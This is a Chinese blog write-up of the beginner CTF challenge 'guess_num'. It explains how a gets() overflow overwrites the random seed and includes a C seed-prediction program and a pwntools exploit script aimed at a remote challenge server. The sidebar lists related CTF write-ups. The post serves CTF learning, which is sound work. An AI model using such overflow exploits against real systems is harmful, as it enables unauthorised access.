pwn刷题num3---覆盖随机数种子

已于 2022-04-22 20:43:15 修改
阅读量548 收藏 5
点赞数
分类专栏: pwn CTF 攻防世界 文章标签: 系统安全 python 网络安全 c语言 安全
于 2022-04-21 17:36:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124326573
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
攻防世界
17 篇文章 0 订阅
订阅专栏

攻防世界pwn新手区—guess_num

在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
在这里插入图片描述

64位,小端序
开启部分RELRO----got表扔可写
开启canary----栈上存在cookie信息导致栈溢出发生异常中断程序
开启了NX保护-----注入的shellcode无法执行
开启PIE----程序内存地址随机化,程序在ida或gdb中的地址都不是真实地址
动态链接

程序是让我们先输入一个名字,然后猜数字,很难猜,直接ida看伪代码
在这里插入图片描述
存在一个危险函数gets,(输入的v7不限制大小)
之后是设置了一个随机数种子(种子位置是seed首地址处)
查看一下栈空间
在这里插入图片描述
v7距离seed0x20字节,(考虑可以通过gets函数输入过多数据覆盖seed为我们想要的值)
用for循环产生10个数字,让我们输入,如果我们输入的数字和系统产生的数字一样,则可以通过这个for循环
在这里插入图片描述
查看一下后面的函数 sub_C3E()

在这里插入图片描述
在这里插入图片描述
system系统调用,直接获得flag!!!

思路:

首先通过gets函数覆盖seed为我们规定的值(本文按1算),用c语言产生随机数种子为1的10个随机数
然后把这些数输入到程序中,直接获得shell

c代码

#include<stdio.h>
#include<stdlib.h>
int main()
{
	int i,x;
	srand(1);
	for(i=0;i<=9;i++)
	{
		x = rand() % 6 + 1;
		printf("%d\n",x);	
	}
	return 0;
}

运行输出为
在这里插入图片描述

exp

'''
控制随机数种子为1(或其他数)来获得flag
'''
from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'amd64')
sh = remote('111.200.241.244',64811)
payload = flat(['a' * 0x20,1])
sh.recvuntil('Your name:')
sh.sendline(payload)	
sh.interactive()

执行获得flag
在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn篇:随机数种子
weixin_44644249的博客
02-02 1093
攻防世界pwn进阶:dice_game 程序分析: 64位elf可执行文件、libc.so.6库文件 保护:除了Canary,其他保护全开 IDA分析程序逻辑 创建一个随机数种子,为当前时间 首先输入名字,长度为55的数组。程序对输入做了处理,当大于49长度时,将最后一个赋值为“0x00”,也就是对字符串长度进行了限制,这个函数没什么问题。 打印输入的字符串,这里也没什么问题。 调用了srand函数,seed是输入名字时字符串第0x41个元素,也就是该值可控。 SUB_A20函数对随机数进行了处理,
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1184
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 628
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
攻防世界 pwn 练习区 guess_num
ChaoYue_miku的博客
07-12 646
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
攻防世界-pwn-dice_game(srand(),rand(),随机数)
hanqdi_的博客
06-27 1947
高手进阶区 dice_game 考察知识点: srand(),rand()函数,产生随机数。 srand和rand()配合使用产生伪随机数序列。 rand函数在产生随机数前,需要系统提供的生成伪随机数序列的种子,rand根据这个种子的值产生一系列随机数。 如果系统提供的种子没有变化,每次调用rand函数生成的伪随机数序列都是一样的。 比如:通常可以利用系统时间来改变系统的种子值,即srand(time(NULL)),可以为rand函数提供不同的种子值,进而产生不同的随机数序列。 如果srand(1),因为1
PWN:关于对Random函数的研究
m0_53932372的博客
03-01 701
random在CTF中经常出现,所以今天我想深度的研究这个函数。 srand()函数 原型:void srand(unsigned seed); 给rand()函数设置种子。 rand()函数 原型 在执行前,会先查看是否使用了srand()函数。 1.使用了srand(seed),就按照这个东西来产生随机数。 2.没有使用srand(seed),就默认使用了srand(1)来产生随机数。 time函数 原型:time_t time(time_t *timer) timer=NULL时得到当前日历时间(从1
PWN做题笔记4-guess_num(已修订)
qq_40923256的博客
04-19 441
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5057&page=1 如图,程序为64位ELF文件 安全机制全部开启,不太可能是注入地址 程序的功能为输入用户名,之后猜10个数,全部猜对可以获取flag main函数用户名存在注入点 查看栈结构可以发现用户名可以覆盖随机数种子 构造输入:b"A"*(0x20)+p32(0),随机数种子为0 以相同的...
pwn random随机数保姆级教程★
YX-hueimie
11-29 2293
本文章为glibc中random随机数的详解,讲解了随机数的诞生。学完本文章,你将会有以下收获:加深对random随机数的理解,略微提升计算机组成原理的水平。
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4325
BUUCTF刷题记录
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
BUUCTF-PWN刷题记录-21
weixin_44145820的博客
05-15 682
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 680
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
pwnable-random
网安星空
01-29 196
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是random,主要考察的是函数rand的知识点。
攻防世界PWN-guess_num
Deeeelete的博客
11-16 678
题目:guess_num checksec查看详情 64位以及各种防护全开 运行一下逻辑,的确是一个猜数游戏 进64位IDA 反编译main函数 出源码 摘代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { FILE *v3; // rdi@1 __int64 v4; // rax@1 const char *v5; // rdi@1 __int64 result; // rax@7 __in
pwn的学习6 random
飞花的世界
12-31 489
这道题 #include &lt;stdio.h&gt; int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &amp;key); if( (key ...
pwn_dice_game
weixin_44464829的博客
10-31 275
常规操作:checksec dice_game 发现文件是64位 放入ida中看c的伪代码: 这是一个猜数字的题,之前有做过类似的题,目的是覆盖seed,使随机数不再随机产生 点开sub_A20()看看随机数怎么构造的: 可以看到rand()%6+1线性同余的方式生成随机数,下一步就是想要覆盖掉种子位置上的值 看一下种子的位置: buf是我们可以写 入数据的缓冲区,通过read函数写入,这又是经典的栈溢出漏洞 0x50-0x10=0x40 因为附件解压后有两个文件,其中一个是l
pwn dice_game
weixin_44319142的博客
05-02 518
dice_game 又是seed from pwn import * from ctypes import * context.log_level='debug' libc = cdll.LoadLibrary("libc.so.6") p = process('./dice_game') #p = remote("111.198.29.45",56813) p.recvuntil(" ...
buuctf-pwn刷题(二)
CHAWUCIREN1的博客
10-15 2083
ciscn_2019_n_1 直接运行一波 猜数字的 checksec file一下 放入ida 发现func函数里面有 东西 这个是一道溢出题,我们输入的数字给v1,但是在进行判断的时候,用的是v2,我们需要溢出v2,使其等于目标值 查看一下栈空间 我们发现v2在栈上04的位置,也就是(0x30-4) 11.28125转化为十六进制为0x41348000 pay load= b’A’*(0x30-4) + p64(0x41348000) from pwn import * payload =
pwn爆破随机数种子是什么意思
最新发布
01-02
pwn爆破随机数种子是指通过不断尝试不同的种子值来破解使用随机数生成器的程序。在引用中的代码示例中,程序使用了一个随机数种子为1的种子值来控制随机数的生成。通过尝试不同的种子值,可以找到正确的种子值,从而...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值